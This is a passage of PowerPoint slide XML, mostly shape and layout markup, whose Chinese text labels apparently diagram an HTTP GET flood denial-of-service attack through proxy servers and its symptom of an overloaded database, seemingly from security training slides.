              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="1572" cy="318"/>
            </a:xfrm>
            <a:prstGeom prst="notchedRightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 123585"/>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78" name="Text Box 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B6AB06C-FA4F-4660-8807-F140CFB8567F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="211" y="63"/>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grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="197642" name="Text Box 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E9E241C-180F-48BE-8EED-A11E25399657}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="611188" y="4737100"/>
            <a:ext cx="1008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正常用户</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="197643" name="AutoShape 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{636BDE55-42D2-447F-927F-284BC6359981}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-1212272">
            <a:off x="1828800" y="3211513"/>
            <a:ext cx="2298700" cy="576262"/>
          </a:xfrm>
          <a:prstGeom prst="notchedRightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 107961"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0000FF"/>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44" name="Text Box 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31924CBB-D7E7-4A39-9D4E-EFB448E39183}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-1280515">
            <a:off x="2078038" y="3373438"/>
            <a:ext cx="165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sp>
        <p:nvSpPr>
          <p:cNvPr id="20497" name="AutoShape 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B36D9FB3-209D-4D95-BAAB-7D62E8EB00DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2619375" y="3295650"/>
            <a:ext cx="506413" cy="503238"/>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0 w 21600"/>
              <a:gd name="T25" fmla="*/ 0 h 21600"/>
              <a:gd name="T26" fmla="*/ 21600 w 21600"/>
              <a:gd name="T27" fmla="*/ 21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700" y="9117"/>
                  <a:pt x="2700" y="10799"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2700" y="15273"/>
                  <a:pt x="6326" y="18900"/>
                  <a:pt x="10800" y="18900"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12482" y="18900"/>
                  <a:pt x="14122" y="18376"/>
                  <a:pt x="15493" y="17401"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4198" y="6106"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FF3300"/>
          </a:solidFill>
          <a:ln w="9525" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="197646" name="Text Box 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCA7E957-5E89-4DDE-89BB-8D90BA9D8892}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5953125" y="1125538"/>
            <a:ext cx="3011488"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400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>攻击表象</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="197647" name="Line 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B873106-8334-4443-ADBD-EA9F4DD56514}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="5651500" y="1341438"/>
            <a:ext cx="0" cy="5224462"/>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7648" name="Line 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6E6FF28-0271-4773-BBF5-E0DE914BF255}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5651500" y="1341438"/>
            <a:ext cx="179388" cy="1587"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="006666"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="45720" rIns="45720" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="197649" name="Rectangle 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8AA5253C-5CBF-4FC0-A4FF-01082E6CF01E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5795963" y="1628775"/>
            <a:ext cx="3097212"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sym typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>利用代理服务器向受害者发起大量</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>HTTP Get</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>请求</a:t>
            </a:r>
          </a:p>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sym typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>主要请求动态页面，涉及到数据库访问操作</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" fontAlgn="ctr">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="60000"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="4D4D4D"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>数据库负载以及数据库连接池负载极高，无法响应正常请求</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="197650" name="Group 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA030415-6012-407C-BC5D-FF8F5754CEEC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1917700" y="1616075"/>
            <a:ext cx="2303463" cy="504825"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1572" cy="318"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="197675" name="AutoShape 23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0D8F90B-6DD7-4F05-9E98-373E6753EAAB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="1572" cy="318"/>
            </a:xfrm>
            <a:prstGeom prst="notchedRightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 123585"/>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76" name="Text Box 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F21232E6-2A74-4BB1-A346-8F1C67245872}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="211" y="63"/>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grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="197651" name="Group 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D7BB803-351D-459C-8EC2-F091243E32A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1917700" y="1806575"/>
            <a:ext cx="2303463" cy="504825"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1572" cy="318"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="197673" name="AutoShape 26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2EFB20DE-91B6-4223-B2F8-4A1DD1572B9C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="1572" cy="318"/>
            </a:xfrm>
            <a:prstGeom prst="notchedRightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 123585"/>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74" name="Text Box 27">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2001053-B24D-4CD3-B3DF-45B4DA63E5A0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="211" y="63"/>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grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="197652" name="Group 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35EECC9A-FD6C-4CB1-A487-90A9FD810E1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1917700" y="2009775"/>
            <a:ext cx="2303463" cy="504825"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1572" cy="318"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="197671" name="AutoShape 29">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E77E457-5CFF-4193-BA88-BAF0F45E1C2A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="1572" cy="318"/>
            </a:xfrm>
            <a:prstGeom prst="notchedRightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 123585"/>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72" name="Text Box 30">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F454ADE3-79CA-43CF-844A-3AC4078394A5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="211" y="63"/>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grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="197653" name="Group 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1045DC11-32BB-4984-91E0-FEA494FEC3DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1917700" y="2200275"/>
            <a:ext cx="2303463" cy="504825"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1572" cy="318"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="197669" name="AutoShape 32">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3593672-FBA6-418D-9446-51FC910B9885}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="1572" cy="318"/>
            </a:xfrm>
            <a:prstGeom prst="notchedRightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 123585"/>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70" name="Text Box 33">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{482B149A-B6F2-4F81-8EBC-98C06A4F74F6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="211" y="63"/>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grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="197654" name="Group 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CF3E6DC-E846-4DF5-BBE6-1C4520D58EFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1917700" y="2403475"/>
            <a:ext cx="2303463" cy="504825"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1572" cy="318"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="197667" name="AutoShape 35">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B23CE79-1B7D-4661-BD05-D58776F7FC7D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="1572" cy="318"/>
            </a:xfrm>
            <a:prstGeom prst="notchedRightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 123585"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF3300"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>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68" name="Text Box 36">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7F5C9F5-7CB3-4B77-914C-88B34FF85115}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="211" y="63"/>
              <a:ext cx="1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buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1200">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:sym typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                </a:rPr>
                <a:t>正常</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1200">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:sym typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>HTTP Get Flood</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="197655" name="Picture 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2889CF8-B437-4F60-B834-7780A4F3B3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25" y="4867275"/>
            <a:ext cx="136842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56" name="AutoShape 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CE8F785-C33B-40A5-AF94-168B899FC123}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4149725" y="3289300"/>
            <a:ext cx="457200" cy="1333500"/>
          </a:xfrm>
          <a:prstGeom prst="upDownArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 53837"/>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57" name="AutoShape 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{691557BA-5966-4809-8ABC-14D4A6F47541}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4641850" y="3289300"/>
            <a:ext cx="457200" cy="1333500"/>
          </a:xfrm>
          <a:prstGeom prst="upDownArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 53837"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none"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58" name="AutoShape 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BC7AE39-96BE-420B-8186-1AD25F4F80EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5133975" y="3289300"/>
            <a:ext cx="457200" cy="1333500"/>
          </a:xfrm>
          <a:prstGeom prst="upDownArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 53837"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0"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buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="zh-CN" sz="1800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="197659" name="AutoShape 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DA81567-EB92-4E18-81CF-BB2703E54F7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-7410297">
            <a:off x="3175000" y="4718050"/>
            <a:ext cx="993775" cy="777875"/>
          </a:xfrm>
          <a:prstGeom prst="cloudCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -40861"/>
              <a:gd name="adj2" fmla="val 59153"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
